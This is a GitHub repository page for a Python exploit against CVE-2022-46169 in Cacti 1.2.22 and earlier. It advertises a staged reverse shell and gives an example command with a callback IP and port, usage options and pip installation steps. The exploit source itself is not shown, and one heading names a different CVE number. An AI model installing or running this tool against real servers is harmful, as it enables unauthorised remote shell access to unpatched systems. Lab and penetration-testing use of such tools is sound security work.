Skip to content

BKreisel/CVE-2022-46169

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

1 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

CVE-2022-41343

🐍 Python Exploit for CVE-2022-46169

Staged Reverse Shell for Cacti <= 1.2.22

Example

cve-2022-46169 10.10.14.5 44444 -u http://cacti.htb

Usage

usage: cve-2022-46169 [-h] -u URL [-s SHELL] ip port

positional arguments:
  ip                    Shell Callback IP Address/Host
  port                  Shell Callback Port

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Cacti Server URL
  -s SHELL, --shell SHELL
                        Remote Shell (default: /bin/bash)

PyPi Installation

python3 -m pip install cve-2022-46169

Manual Installation

python3 -m pip install cve-2022-46169-1.0.0-py3-none-any.whl

Download Latest Release

Demo

demo